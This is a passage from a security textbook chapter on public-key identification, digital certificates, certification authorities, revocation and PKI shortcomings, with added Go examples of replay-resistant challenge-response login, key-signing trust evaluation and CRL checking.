A better choice for position-based authentication is the positional services offered by some mobile telephone networks. With these systems, the network can determine the user's location and then directly report this information to the service, without risking that the information may be compromised while the user is authenticated. A simple form of location-based authentication is to have a particular terminal or computer that is authorized to perform a special function. People who are in other locations are prohibited from exercising privilege. To date, location has not been used as a general system for authentication.

Using Public Keys for Identification

The identification and authentication techniques mentioned earlier all share a common flaw: to reliably identify an individual, that person must be in the presence of the person or computer that is performing the identification. If the person is not present--if the identification is being performed by telephone, by fax, or over the Internet--then there is high potential for fraud or abuse because of replay attacks.

Imagine a situation in which one computer acquires a user's fingerprint and another performs the verification. In this case, it is possible for an attacker to intercept the code for the digitized fingerprint as it moves over the network. Once the attacker has the fingerprint transmission, the attacker can use it to impersonate the victim. Replay attacks are a fundamental attack against the digital identification systems mentioned so far.

Properly implemented, public key cryptography can eliminate the risk of replay attacks. When public key systems are used for identification, the private key is used to create a signature and the public key is used to verify that signature. As the private key never leaves the possession of the person being identified--it never gets sent over the wire--there is no opportunity for an attacker to intercept the private key and use it for malicious purposes.
Public key cryptography can be used for either offline authentication or online authentication. In the case of offline authentication, a user creates a digitally-signed message that can be verified at a point in the future. In the case of online authentication, a user authenticates in real time with a remote server. The remote server sends the user's computer randomly-generated challenge data, and the user's computer digitally signs the challenge with the user's private key and returns it. Or, in another variation, the remote server encrypts a challenge with the user's public key and sends the encrypted challenge to the user, who proves her identity by decrypting the challenge and returning it encrypted with the server's public key. Because of the challenge-response protocol, online systems are generally more secure than offline systems.

Managing Private Keys

When a digital signature is used to "prove someone's identity," identity proving is not precisely what is taking place. Being able to create a valid digital signature doesn't prove you are a particular person: it proves you have possession of a particular private key. That's why it's possible to find keys on public key servers purporting to be for Hillary Clinton and Batman.

For digital signature validation to become identity authentication, several preconditions need to be met:

1. Each private key/public key pair must be used by only one person.
2. The private key must be kept secure, lest it be compromised, captured, and used fraudulently by others.
3. There needs to be some sort of trust mechanism in place, so that the person verifying the identity can trust or believe that the name on the key is in fact the correct name.

If keys are carelessly generated, then it may be possible for an attacker to take a public key and determine the corresponding private key. If keys are not stored properly, then the attacker may simply be able to steal the private key.
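The online challenge-response exchange described above, written out as an added example that is not from the Handbook: both sides in Go using Ed25519 from the standard library, with a single-use, server-side challenge so that a (challenge, signature) pair captured from the wire is useless to a replaying eavesdropper. The user name "jane" and the message prefix are constructed for the example.

```go
package main

import (
	"bytes"
	"crypto/ed25519"
	"crypto/rand"
	"errors"
	"fmt"
)

// Domain-separation prefix: a login signature can never be mistaken for a
// signature the same key made over some other kind of data.
const challengePrefix = "auth-challenge-v1:"

// Server holds each enrolled user's public key and the single challenge
// currently outstanding for that user. A challenge is consumed on use, so
// the same (challenge, signature) pair is never accepted twice.
type Server struct {
	users   map[string]ed25519.PublicKey
	pending map[string][]byte
}

func NewServer() *Server {
	return &Server{users: map[string]ed25519.PublicKey{}, pending: map[string][]byte{}}
}

// Register enrols a public key; the private key never reaches the server.
func (s *Server) Register(user string, pub ed25519.PublicKey) { s.users[user] = pub }

// Challenge issues 32 fresh random bytes for one login attempt.
func (s *Server) Challenge(user string) ([]byte, error) {
	if _, ok := s.users[user]; !ok {
		return nil, errors.New("unknown user")
	}
	c := make([]byte, 32)
	if _, err := rand.Read(c); err != nil {
		return nil, err
	}
	s.pending[user] = c
	return c, nil
}

func signedBytes(challenge []byte) []byte {
	return append([]byte(challengePrefix), challenge...)
}

// Verify accepts a response only if it is a valid signature, by the enrolled key,
// over the challenge currently outstanding for this user, which is then discarded.
func (s *Server) Verify(user string, challenge, sig []byte) error {
	expected, ok := s.pending[user]
	if !ok || !bytes.Equal(expected, challenge) {
		return errors.New("no matching outstanding challenge (stale or replayed)")
	}
	delete(s.pending, user)
	if !ed25519.Verify(s.users[user], signedBytes(challenge), sig) {
		return errors.New("bad signature")
	}
	return nil
}

// Respond is the client side: sign the challenge with a private key that stays
// on the client machine.
func Respond(priv ed25519.PrivateKey, challenge []byte) []byte {
	return ed25519.Sign(priv, signedBytes(challenge))
}

// Scenario runs one honest login, then two replays by an eavesdropper who
// captured the (challenge, signature) pair: resending it at once, and using
// it to answer a later, different challenge.
func Scenario() (honestOK, replaysRejected bool, err error) {
	pub, priv, err := ed25519.GenerateKey(rand.Reader)
	if err != nil {
		return false, false, err
	}
	srv := NewServer()
	srv.Register("jane", pub) // constructed user
	c1, err := srv.Challenge("jane")
	if err != nil {
		return false, false, err
	}
	capturedChallenge, capturedSig := c1, Respond(priv, c1) // what crossed the wire
	honestOK = srv.Verify("jane", capturedChallenge, capturedSig) == nil
	replay1 := srv.Verify("jane", capturedChallenge, capturedSig) // challenge already consumed
	if _, err = srv.Challenge("jane"); err != nil { // server now expects a new nonce
		return false, false, err
	}
	replay2 := srv.Verify("jane", capturedChallenge, capturedSig)
	return honestOK, replay1 != nil && replay2 != nil, nil
}

func main() {
	honest, rejected, err := Scenario()
	fmt.Println("honest login accepted:", honest, "| both replays rejected:", rejected, "| err:", err)
}
```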
While these rules look simple on the surface, in practice they can be exceedingly difficult to implement properly. Even worse, frequently it is difficult to evaluate a company's public key system and decide if it is more secure or less secure than a competing system.

There are a number of different alternatives for creating and storing keys. Roughly in order of decreasing security, they are:

1. Employ a cryptographic coprocessor such as a smart card. A typical public key-compatible smart card has a small microprocessor with a hardware random number generator for creating keys and performing the basic public key algorithms; it also has a region of memory that can hold the keys and public key "certificates". In theory, the private key never actually leaves the card. Instead, if you want to sign or decrypt a piece of information, that piece of information has to be transmitted into the card, and the signed or decrypted answer transmitted off the card. Thus, attackers cannot use the private key unless they have possession of the smart card. Smart cards can be augmented with PINs, passphrases, fingerprint readers, or other biometric devices, so that the card will not create a signature unless the holder is authenticated to the card.

Smart cards aren't without their drawbacks, however. Some types are quite fragile. If the card is lost, stolen, or damaged, the keys it contains are gone and no longer available to the user. Thus, if the keys on the card are to be used for long-term encryption of information, it may be desirable to have some form of card duplication system or key escrow to prevent key loss. Such measures are not needed, however, if the keys are only used for digital signatures. If a signing key is lost, it is only necessary to create a new signing key: no information is lost.

Smart cards are not completely tamper-proof. Cryptographic smart cards implement tiny operating systems: flaws in these operating systems can result in the compromise of key material.
It is also possible to physically analyze a card and force it to divulge its key. Nevertheless, smart cards are currently the most secure way to store private keys.

2. Generate them on a desktop computer and then store the encrypted keys on a floppy disk or flash disk. When the key is needed, the user inserts the floppy disk into the computer's drive; the computer reads the encrypted private key into memory, decrypts the key, and finally uses the key to sign the requested information. This technique is less secure than the smart card because it requires that the private key be transferred into the computer's memory, where it could be attacked and compromised by a computer virus, Trojan horse, or other rogue program.

3. Generate the key inside the computer, then encrypt the key using a passphrase and store the key in a file on the computer's hard disk. This is the technique that programs such as PGP and Netscape Navigator use to protect private keys. This technique is convenient. The disadvantage is that if somebody gains access to your computer and knows your passphrase, he or she can access your private key. And because the key must be decrypted by the computer to be used, it is vulnerable to attack inside the computer's memory by a rogue program or a Trojan horse.

4. The least secure way to generate a public key/private key pair is to let somebody else do it for you, and then to download the private and public keys. The fundamental problem with this approach is that the private key is by definition compromised: somebody else has a copy of it. Nevertheless, some organizations (and some governments) require that people use third-party key generation for this very reason: so that the organization will have a copy of each user's key, allowing the organization to decrypt all email sent to the individual.
In practice, most cryptographic systems use the third option--generating a key on a desktop computer and then storing the key on the computer's hard disk.

Digital Certificates

The use of digital certificates and a public key infrastructure (PKI) are attempts to tie absolute identity to digital signatures. A digital certificate is a special kind of digital signature--it is a digital signature that comes with an identity, which is designed to be interpreted by computers in an automated way. A public key infrastructure is a collection of technologies and policies for creating and using digital certificates. The effectiveness of these systems comes from a marriage of public key cryptography, carefully written and maintained policies, and the legal system.

The problem of digital identification with public keys has profoundly deep philosophical implications. How can you ever know if a public key really belongs to the individual or an organization whose name is on the key? How can we ever really know anything? As it turns out, we can know quite a bit about the identity of key holders and the authenticity of digital certificates, as long as certain rules and procedures are followed in the creation and protection of these instruments.

There are three basic approaches to ensuring that a public key really belongs to the individual it claims to:

1. Get the public key directly from the individual and confirm the key's integrity in a manner that cannot be falsified.
2. Determine that another individual that you trust vouches for the key.
3. Determine that a reliable central authority has certified the key.

Confirming a Key's Integrity Personally

One way to be sure that you've got Jane Trocard's public key is to meet with Jane and have her read out her copy of the key and compare it, number-for-number, with yours.
If you know Jane well enough, and if you trust the telephone system, you might do this comparison over the telephone instead, but not over the Internet, where someone could intercept the comparison and replace the numbers with those of a bogus key.

Because public keys are based on very long numbers, number-by-number comparison is inconvenient. Instead, you and Jane might independently compute a shorter cryptographic message digest and compare the characters in that digest. Such digests are often called "key fingerprints". Some avid public key cryptography users print their key fingerprints on their business cards; if you've received a business card directly from Jane, you can later download her public key and verify its integrity.

Certifying Other People's Keys

Once you know that Jane's key is valid (that it's really her key), you might be willing to accept other public keys if Jane will vouch for them. Jane can vouch for other people's keys by signing them with her own key. When you receive a key signed by Jane's key, you know that Jane herself has signed it, because you know that Jane's key is valid and you assume only Jane has access to it.

The decision to accept keys that Jane vouches for is not based on the validity of Jane's key, but on the level of trust you have for Jane herself to be careful about whose keys she vouches for. In most public key systems, these two concepts, the validity of a key and the trust you assign its owner, are independent. In some systems, you can require that two or more trusted parties each vouch for a key before you are willing to accept it as valid.

PGP users often hold "signing parties" at which they meet, in person, to verify one another's keys and then sign them. At the end of such a party, a participant's public key may have a dozen or more signatures that someone else can later use to decide if the key is valid.
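The fingerprint check and the vouching mechanism described in the two sections above, as an added example that is not from the Handbook (a toy key-signature format in Go using the standard library's Ed25519, not OpenPGP): a key validated in person from its fingerprint, keys accepted on the strength of trusted introducers' signatures, and validity kept separate from trust, including the variant that requires several trusted vouchers. Jane, Bob and the stranger's signature are constructed for the example.

```go
package main

import (
	"crypto/ed25519"
	"crypto/rand"
	"crypto/sha256"
	"encoding/hex"
	"errors"
	"fmt"
)

// Fingerprint is a short digest of a public key, the thing you print on a
// business card or read over the phone (hex SHA-256 here; PGP uses its own layout).
func Fingerprint(pub ed25519.PublicKey) string {
	sum := sha256.Sum256(pub)
	return hex.EncodeToString(sum[:])
}

// KeySig is one "I vouch for this key" signature (toy layout, not OpenPGP).
type KeySig struct {
	Owner  string
	Key    ed25519.PublicKey
	Signer ed25519.PublicKey
	Sig    []byte
}

func bindingBytes(owner string, key ed25519.PublicKey) []byte {
	return append([]byte("keysig-v1:"+owner+":"), key...)
}

// Vouch is what Jane does at a signing party after checking Bob's ID and fingerprint.
func Vouch(signerPriv ed25519.PrivateKey, owner string, key ed25519.PublicKey) KeySig {
	return KeySig{Owner: owner, Key: key, Signer: signerPriv.Public().(ed25519.PublicKey),
		Sig: ed25519.Sign(signerPriv, bindingBytes(owner, key))}
}

// Keyring keeps the two notions apart: keys known to be valid (really belonging to the
// named owner) and owners you Trust as introducers. Required is how many must vouch.
type Keyring struct {
	valid    map[string]ed25519.PublicKey
	Trusted  map[string]bool
	Required int
}

func NewKeyring(required int) *Keyring {
	return &Keyring{valid: map[string]ed25519.PublicKey{}, Trusted: map[string]bool{}, Required: required}
}

// AcceptInPerson validates a downloaded key against a fingerprint obtained out
// of band; a mismatch means the downloaded copy is not the owner's key.
func (kr *Keyring) AcceptInPerson(owner string, downloaded ed25519.PublicKey, fingerprintFromCard string) error {
	if Fingerprint(downloaded) != fingerprintFromCard {
		return fmt.Errorf("fingerprint mismatch for %s: key refused", owner)
	}
	kr.valid[owner] = downloaded
	return nil
}

// Validate decides whether key belongs to owner; only valid, trusted introducers' signatures count.
func (kr *Keyring) Validate(owner string, key ed25519.PublicKey, sigs []KeySig) (bool, error) {
	counted := map[string]bool{}
	for _, s := range sigs {
		if s.Owner != owner || !s.Key.Equal(key) {
			continue // a signature over some other binding says nothing about this one
		}
		for name, vk := range kr.valid {
			if vk.Equal(s.Signer) && kr.Trusted[name] && ed25519.Verify(vk, bindingBytes(owner, key), s.Sig) {
				counted[name] = true
			}
		}
	}
	if len(counted) < kr.Required {
		return false, errors.New("not enough signatures from trusted introducers")
	}
	kr.valid[owner] = key
	return true, nil
}

// Scenario: you check Jane's key against the fingerprint on her card; Jane and a stranger
// both sign Bob's key. Reports whether Bob's key is accepted before and after you trust Jane.
func Scenario() (beforeTrust, afterTrust bool, err error) {
	janePub, janePriv, _ := ed25519.GenerateKey(rand.Reader)
	bobPub, _, _ := ed25519.GenerateKey(rand.Reader)
	_, strangerPriv, _ := ed25519.GenerateKey(rand.Reader)
	kr := NewKeyring(1)
	if err = kr.AcceptInPerson("jane", janePub, Fingerprint(janePub)); err != nil { // card: constructed
		return
	}
	sigs := []KeySig{Vouch(strangerPriv, "bob", bobPub), Vouch(janePriv, "bob", bobPub)}
	beforeTrust, _ = kr.Validate("bob", bobPub, sigs) // Jane's key is valid, but she is not yet trusted
	kr.Trusted["jane"] = true
	afterTrust, _ = kr.Validate("bob", bobPub, sigs)
	return
}

func main() { fmt.Println(Scenario()) }
```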
PGP users distribute their keys worldwide on PGP key servers; when you download a key from a key server, you can use the signatures to decide whether you believe that this key really identifies the user it claims to.

Certification Authorities: Third-Party Registrars

While key signing parties are a great way to meet people, experience has shown that they are not a practical way to create a national database of cross-certified public keys--the coverage is simply too uneven. Some people don't have the time to go to key signing parties. Moreover, having somebody's signature on your key reveals that you know each other, or at least that you met each other. That's why most large-scale uses of public key cryptography rely on a tree of certifications, with a certification authority at the root.

A certification authority (CA) is any individual or organization that issues digital certificates. A CA can impose standards before it signs a key; for example, a university might verify that the key that it was about to sign really belonged to a bona fide student. Another CA might not have any standards at all.

The world's largest CA, VeriSign, issues several different kinds of certificates. VeriSign signs certificates under its VeriSign Trust Network (VTN) for public use; the company also issues certificates for use within corporations. The lowest level of certificates issued by VTN have no assurance; the highest levels come with the promise that VTN attempted to establish the identity of the key holder before the certificate was issued.

Conceptually, a certificate signed by a CA looks like a cryptographically signed index card. The certificate contains the identity information of the user, signed by the certification authority's own private key, and also lists the name of the CA, that CA's public key, and a serial number. To date, most certificates are a promise by the CA that a particular public key belongs to a particular individual or organization.
But certificates can also be used for assertions, as in the university example. There are many different ways that a certification authority can offer service:

Internal CA
An organization can operate a CA to certify its own employees. Certificates issued by an internal CA might certify an individual's name, position, and level of authority. These certificates could be used within the organization to control access to internal resources or the flow of information. Such an internal CA would be the basis of the organization's public key infrastructure. Companies can also operate internal CAs that issue certificates to customers. For example, some brokerages have required that their customers obtain certificates before they are allowed to execute high value trades over the Internet.

Outsourced CA
An organization might want to partake in the benefits of using digital certificates, but not have the technical ability to run its own certification authority. Such an organization could contract with an outside firm to provide certification services for its own employees or customers, exactly as a company might contract with a photo lab to create identification cards.

Trusted third-party CA
A company or a government can operate a CA that binds public keys with the legal names of individuals and businesses. Such a CA can be used to allow individuals with no prior relationship to establish each other's identity and engage in legal transactions. Certificates issued by such a CA would be analogous to drivers' licenses and identity cards issued by a state.

Before you can use the certificates issued by a CA, you need to have a copy of the CA's public key. Public keys are distributed on certificates of their own. Currently, most of these certificates are prebundled in web browsers and operating systems. CA public keys can also be added manually by the end user.
Clearly, CAs that do not have their keys prebundled are at a disadvantage. Although Microsoft and Netscape have now opened up their browsers to any CA that can meet certain auditing requirements, the original web browsers were distributed with a small number of carefully selected CA keys. The bundling of these keys was a tremendous advantage to these CAs and a barrier to others.

Certification Practices Statement (CPS)

The certification practices statement (CPS) is a legal document CAs publish that describes their policies and procedures for issuing and revoking digital certificates. It answers the question, "What does it mean when this organization signs a key?" CPS documents are designed to be read by humans, not by machines. A business might be willing to accept certification from a CA that guarantees minimum certification policies and a willingness to assume a certain amount of liability in the event that its certification policies are not followed--and provided that the CA is bonded by an appropriate bonding agency.

The X.509 v3 Certificate

Although certification authorities can issue any kind of certificate, in practice the vast majority of CAs issue certificates that follow the X.509 v3 standard. Likewise, most cryptographic programs and protocols, including SSL, are only designed to use X.509 v3 certificates. The only notable exception to this is PGP, which uses its own certificate format, although recent versions support reading some X.509 certificates. (The Secure Shell (ssh) program does not use certificates, but instead relies on users confirming public keys personally.)

Each X.509 certificate contains a version number, a serial number, identity information, algorithm-related information, and the signature of the issuing authority. The industry adopted X.509 v3 certificates, rather than the original X.509 certificates, because the X.509 v3 standard allows arbitrary name/value pairs to be included in the standard certificate.
These pairs can be used for many purposes and allow the uses of certificates to be expanded without changing the underlying protocol.

Types of Certificates

There are four primary types of digital certificates in use on the Internet today:

Certification authority certificates
These certificates contain the public keys of CAs and either the name of the CA or the name of the particular service being certified. These certificates are typically self-signed--that is, signed with the CA's own private key. CAs can also cross-certify, or sign each other's master keys. What such cross-certification actually means is an open question. Microsoft Windows, Microsoft Internet Explorer, Netscape Navigator, and OpenSSL are all shipped with more than a dozen different CA certificates. Several companies have more than one CA certificate in the CA lists that are distributed with web browsers. VeriSign has the most: over 20 different certificates. Signatures by different private keys denote different levels of trust and authentication.

Server certificates
These certificates contain the public key of an SSL server, the name of the organization that runs the server, and the DNS name of the server. Every cryptographically-enabled information server on the Internet must be equipped with a server certificate for the SSL encryption protocol to function properly. Although the originally stated purpose of these certificates was to allow consumers to determine the identity of web servers and to prevent man-in-the-middle attacks, in practice server certificates are more widely used for encryption than for server authentication.

Personal certificates
These certificates contain an individual's name and the individual's public key. They can have other information as well, such as the individual's e-mail address, postal address, or birth date. They are issued by organizations to their customers or employees.
Personal certificates are a substantially more secure way of having people identify themselves on the Internet than usernames and passwords. They are also required for users of the S/MIME e-mail encryption protocol.

Software publisher certificates
These certificates are used to verify the signatures on software that is distributed, such as ActiveX components and downloadable executables. Every copy of recent Windows operating systems is distributed with a number of software publisher certificates that can be used to validate the signatures on Windows applications.

Minimal disclosure certificates
Dig certificates represent a threat to the privacy of their users. When you present a certificate to a server, the server can easily record all of the information about your identity that's present on the certificate, whether or not it's necessary to authenticate you to that server. In many jurisdictions, an organization that obtained this information in the course of business would be free to do whatever it wished with the data. A way to minimize the privacy threat is by using minimal disclosure certificates. These certificates allow the holder to selectively reveal specific facts that are on a certificate without revealing others. A woman who wanted to gain access to a web site for a cancer survivors group might use minimal disclosure certificates to prove to the web site that she was a woman over 21 who had breast cancer without revealing her name or address. Minimal disclosure certificates were invented by the mathematician Stefan Brands and exclusively licensed in February 2000 to the Canadian corporation Zero Knowledge Systems.[212]

Revocation

Besides issuing certificates, CAs need a way of revoking them if the private key is compromised or the CA makes a mistake. Certificates may also need to be revoked when an employee is terminated.
The need for effective revocation mechanisms was made particularly clear in March 2001, when Microsoft announced that VeriSign had issued two certificates in January "to an individual who fraudulently claimed to be a Microsoft employee. The common name assigned to both certificates is Microsoft Corporation." Microsoft went on to note that "the ability to sign executable content using keys that purport to belong to Microsoft would clearly be advantageous to an attacker who wished to convince users to allow the content to run."[213]

[212] http://www.wired.com/news/technology/0,1282,34496,00.html
[213] http://www.microsoft.com/technet/security/bulletin/MS01-017.asp

Certificate revocation lists

One approach to revocation is the certificate revocation list (CRL). A CRL is a list of every certificate that has been revoked by the CA that has not yet expired for other reasons. Ideally, a CA issues a CRL at regular intervals. Besides listing certificates that have been revoked, the CRL states how long it will be valid and where to get the next CRL.

Current practice is that X.509 v3 certificates should contain a field called the CRL distribution point (CDP). In theory, a program that wishes to verify if a certificate has been revoked should be able to download a CRL from the CDP to determine if the certificate has been revoked. As most certificates will be issued by a small number of CAs, it is reasonable to assume that a program might download a new CRL every day or every hour, and then cache this list for successive lookups. An organization with limited Internet connectivity could download the CRL once and distribute it to its users.

In practice, CRLs and CDPs have had a variety of problems:

· If a CA is very popular, it is likely that the CRLs will grow very large. VeriSign's 900K CRL for its SSL server certificates can take more than 20 minutes to download over a dialup connection.
· There is a period between the time that a certificate is revoked and the time that the new CRL is distributed when a certificate appears to be valid but is not.
· The information contained in CRLs can be used for traffic analysis.
· Many programs do not properly implement CRLs and CDPs. In the case of the fraudulently-issued Microsoft certificate, the bogus certificate was revoked and listed in VeriSign's CRL. Unfortunately, the certificates that VeriSign issued did not contain valid CDPs. (According to VeriSign, CDPs are not present in Authenticode certificates because of a bug in the implementation of Authenticode distributed with Internet Explorer 3.02.) Without the CDP, a program that attempted to verify the authenticity of the fraudulently-issued certificates would not know where to find the CRL on which the certificates were listed.[214]

Real-time certificate validation

An alternative to CRLs is to use real-time validation of certificates. These systems consult an online database operated by the certification authority every time the authenticity of a certificate needs to be validated. Real-time certification validation systems neatly dispense with the CRL problem, although they do require a network that is reliable and available.

The primary problem with real-time validation is one of scale. As there are more and more users of certificates, the validation servers need to be faster and faster to serve the larger user community. Furthermore, real-time systems are vulnerable to denial of service (DoS) attacks. If it is not possible for a business to connect to the revocation server, what should be done with a certificate--trust it or discard it? If the default is to trust it, fraud can be committed by flooding the revocation server so as to make it unresponsive while a revoked certificate is used.
If the default is to reject requests when the revocation server is unreachable, then it is possible to cause all transactions to be rejected using a DoS attack, thus damaging the reputation of the business through a cascading denial of service.

[214] In the end, Microsoft had to issue an operating system patch to resolve the problem. The patch contained an additional revocation handler that causes Internet Explorer to consult a local CRL to evaluate the authenticity of certificates, and a local CRL listing the two mistakenly issued VeriSign certificates.

Public Key Infrastructure

Public key infrastructure (PKI) is the system of digital certificates, certification authorities, tools, systems, and hardware that are used to deploy public key technology. Many of the early proponents of PKI envisioned a single PKI, operated by or for governments, which would provide state-certified certificates. The public PKI was a grand vision, but so far it hasn't happened. Companies such as VeriSign have issued millions of certificates to verify the identity of individuals and organizations, and the keys to sign these certificates have been widely distributed. Some of these so-called trust hierarchies, such as the trust hierarchy used to certify web server certificates, are used by more than a hundred million people. But they are run by private businesses, and not by governments. The word "public" in PKI refers to public keys, rather than to the public at large.

Shortcomings of Today's CAs

It's unfortunate, but if you look closely into the root certificates that are bundled with Internet Explorer and Netscape Navigator, you'll see that there are significant inconsistencies and quality control problems with today's CAs.
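The CRL handling and the unreachable-server dilemma discussed in the two revocation sections above, as an added example that is not from the Handbook: a Go checker built on the standard library's crypto/x509 that reads the CRL fetched from a certificate's CDP, verifies the issuing CA's signature and the CRL's NextUpdate, and applies an explicit fail-open or fail-closed policy whenever revocation status cannot be determined, including a certificate that carries no CDP at all. The CA, the two leaf certificates (serials 42 and 43), the CDP URL and the CRL are all constructed inside the block.

```go
package main

import (
	"crypto/ecdsa"
	"crypto/elliptic"
	"crypto/rand"
	"crypto/x509"
	"crypto/x509/pkix"
	"errors"
	"fmt"
	"math/big"
	"time"
)

// Policy decides what happens when revocation status cannot be determined
// (no CDP in the certificate, CDP unreachable, or cached CRL past NextUpdate).
type Policy int

const (
	FailOpen   Policy = iota // accept: flooding the CRL server lets a revoked certificate through
	FailClosed               // reject: flooding the CRL server blocks every transaction
)

var ErrRevoked = errors.New("certificate is revoked")
var ErrUndetermined = errors.New("revocation status could not be determined")

// CheckRevocation returns nil if cert is acceptable under policy p at time now;
// crlDER is the CRL fetched from cert's CDP, or nil if the fetch failed.
func CheckRevocation(cert, issuer *x509.Certificate, crlDER []byte, now time.Time, p Policy) error {
	undetermined := func(why string) error {
		if p == FailClosed {
			return fmt.Errorf("%w: %s", ErrUndetermined, why)
		}
		return nil
	}
	if len(cert.CRLDistributionPoints) == 0 {
		return undetermined("certificate carries no CRL distribution point")
	}
	crl, err := x509.ParseRevocationList(crlDER) // nil input fails here too
	if err != nil {
		return undetermined("CRL missing or unparsable")
	}
	if err := crl.CheckSignatureFrom(issuer); err != nil {
		return undetermined("CRL not signed by the certificate's issuer")
	}
	if now.After(crl.NextUpdate) {
		return undetermined("cached CRL is stale; a newer one was due")
	}
	for _, rc := range crl.RevokedCertificates {
		if rc.SerialNumber.Cmp(cert.SerialNumber) == 0 {
			return ErrRevoked
		}
	}
	return nil
}

func must[T any](v T, err error) T {
	if err != nil {
		panic(err)
	}
	return v
}

type Fixture struct {
	CA, Revoked, NoCDP *x509.Certificate // constructed CA; Revoked (serial 42) has a CDP, NoCDP (43) has none
	CRL                []byte            // revokes serial 42; NextUpdate is 24 hours after Issued
	Issued             time.Time
}

func BuildFixture() *Fixture {
	now := time.Now()
	caKey := must(ecdsa.GenerateKey(elliptic.P256(), rand.Reader))
	caTmpl := &x509.Certificate{SerialNumber: big.NewInt(1), Subject: pkix.Name{CommonName: "Example Test CA"},
		NotBefore: now.Add(-time.Hour), NotAfter: now.Add(72 * time.Hour), IsCA: true, BasicConstraintsValid: true,
		SubjectKeyId: []byte{1, 2, 3, 4}, KeyUsage: x509.KeyUsageCertSign | x509.KeyUsageCRLSign}
	ca := must(x509.ParseCertificate(must(x509.CreateCertificate(rand.Reader, caTmpl, caTmpl, &caKey.PublicKey, caKey))))
	issue := func(serial int64, cdp []string) *x509.Certificate {
		key := must(ecdsa.GenerateKey(elliptic.P256(), rand.Reader))
		tmpl := &x509.Certificate{SerialNumber: big.NewInt(serial), Subject: pkix.Name{CommonName: "leaf"},
			NotBefore: now.Add(-time.Hour), NotAfter: now.Add(72 * time.Hour), CRLDistributionPoints: cdp}
		return must(x509.ParseCertificate(must(x509.CreateCertificate(rand.Reader, tmpl, ca, &key.PublicKey, caKey))))
	}
	crl := must(x509.CreateRevocationList(rand.Reader, &x509.RevocationList{
		Number: big.NewInt(1), ThisUpdate: now, NextUpdate: now.Add(24 * time.Hour),
		RevokedCertificates: []pkix.RevokedCertificate{{SerialNumber: big.NewInt(42), RevocationTime: now}},
	}, ca, caKey))
	return &Fixture{CA: ca, Revoked: issue(42, []string{"http://crl.example.test/ca.crl"}), // hypothetical CDP URL
		NoCDP: issue(43, nil), CRL: crl, Issued: now}
}

func main() {
	f := BuildFixture()
	stale := f.Issued.Add(48 * time.Hour) // the cached CRL is now past its NextUpdate
	fmt.Println("revoked, fresh CRL:         ", CheckRevocation(f.Revoked, f.CA, f.CRL, f.Issued, FailClosed))
	fmt.Println("revoked, stale CRL, open:   ", CheckRevocation(f.Revoked, f.CA, f.CRL, stale, FailOpen))
	fmt.Println("revoked, stale CRL, closed: ", CheckRevocation(f.Revoked, f.CA, f.CRL, stale, FailClosed))
	fmt.Println("no CDP, CRL fetch impossible, closed:", CheckRevocation(f.NoCDP, f.CA, nil, f.Issued, FailClosed))
}
```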
Lack of permanence for Certificate Policies field

Internet Explorer's Certificate panel allows you to automatically open the web page that is associated with the certification practices statement for each of the certificates that is registered. This URL is carried in a field called "Certificate Policies" in the X.509 v3 certificate. It is very important for a CA to maintain a web page at every URL that is listed in every certificate that it has ever issued. If these URLs move, links should be left in their place. If a CA changes its CPS, then it must archive each CPS at a unique URL. These links must remain accessible for the lifetime of any signed certificate that references the CPS, because the legal meaning of the certificate cannot be determined without reading the certificate practices statement. Furthermore, because it is possible that the meaning of a signature might be questioned many years after the signature is created, the URLs should probably remain active for a period of at least 20 years.

Unfortunately, many CA certificates point to CPSs that are no longer accessible. The self-signed certificate distributed with Internet Explorer 5.0 for the Autoridad Certificadora del Colegio Nacional de Correduria Publica Mexicana, A.C. is valid from June 29, 1999 until June 29, 2009. The certificate claims that the certificate practices statement for this key is located at http://www.correduriapublica.org.mx/RCD/dpc. Nevertheless, by April 2001 the URL for that CPS was not accessible.

Inconsistencies in certificate fields

The CA certificates that are bundled into Netscape Navigator and Internet Explorer are supposed to be the basis for the world's e-commerce infrastructure and legally binding agreements. Complicating this goal is the fact that there is a huge variation in the ways that the certificate fields are being used by different organizations.
In particular, the "Subject" field, which identifies the issuer by its Distinguished Name, has no standard format, and different CA certificates include wildly different qualifiers in their Subject. Consistency in the use of the Distinguished Name and other fields is vital if certificates are to be processed in a programmatic way with software. Without this consistency, certificates need to be visually inspected by individuals who are trained to understand all of the different styles and formats that legitimate names can have, so that valid certificates can be distinguished from rogue ones.

Unrealistic expiration dates

Early versions of the Netscape Navigator web browser were distributed with CA certificates that had expiration dates between December 25, 1999 and December 31, 1999. These products were in use far longer than anybody anticipated. When the end of 1999 rolled around, many of the products with these old CA certificates inside them simply stopped working. Although it should have been possible to simply download new certificates, users were advised to upgrade their entire applications because of other security problems with these early products. Many users were not happy that the software they had been depending on suddenly stopped working.

As a result of this experience, many CAs have decided to err in the other direction. They have started distributing CA certificates with unrealistically long expiration times. All of the certificates distributed with Internet Explorer 5.0 are 1024-bit RSA certificates, yet more than half of these certificates have expiration dates after January 1, 2019! VeriSign distributes eight certificates with Internet Explorer 5.5 that have expiration dates in the year 2028! Many cryptographers believe that 1024-bit RSA will not be a secure encryption system at that point in the future.
PKI Policy Issues

The need for a widespread PKI is compelling. There are growing incidents of fraud on the Internet, and there is an increasing need to use digital signatures to do business. Yet widespread PKI seems further away today than it was in the mid 1990's.

It's an article of faith among computer security specialists that private keys and digital certificates can be used to establish identity. But these same specialists will pick up the phone and call one another when the digital signature at the bottom of an e-mail message doesn't verify. That's because it is very, very easy for the technology to screw up. Here are a few of the problems that must be faced in building a true PKI.

Private Keys Are Not People

Digital signatures facilitate proofs of identity, but they are not proofs of identity by themselves. Unless the private key is randomly generated and stored in such a way that it can only be used by one individual, the entire process may be suspect. Unfortunately, both key generation and storage depend on the security of the end user's computer. But the majority of the computers used to run Netscape Navigator or Internet Explorer are unsecure. Many of these computers run software that is downloaded from the Internet without knowledge of its source. Some of these computers are infected by viruses. Some of the programs downloaded have Trojan horses pre-installed. And the most common operating system and browser are terribly buggy, with hundreds of security patches issued over the past few years, so it is possible that any arbitrary system in use on the network has been compromised in the recent past by parties unknown.

The widespread use of smart cards and smart card readers may make it much more difficult to steal somebody's private key. But it won't be impossible to do so.

Distinguished Names Are Not People

Protecting private keys is not enough to establish the trustworthiness of the public key infrastructure. How do you determine if the name in the Distinguished Name field is really correct? Each CA promises that it will follow its own certification rules when it signs a certificate. How do you know that a CA's rules will assure that a distinguished name on the certificate really belongs to the person they think it does?

How do you evaluate the trustworthiness of a CA? Should private companies be CAs, or should that task be reserved for nations? Would a CA ever break its rules and issue fraudulent digital identification documents? After all, governments, including the United States, have been known to issue fraudulent passports when their interests have demanded that they do so.

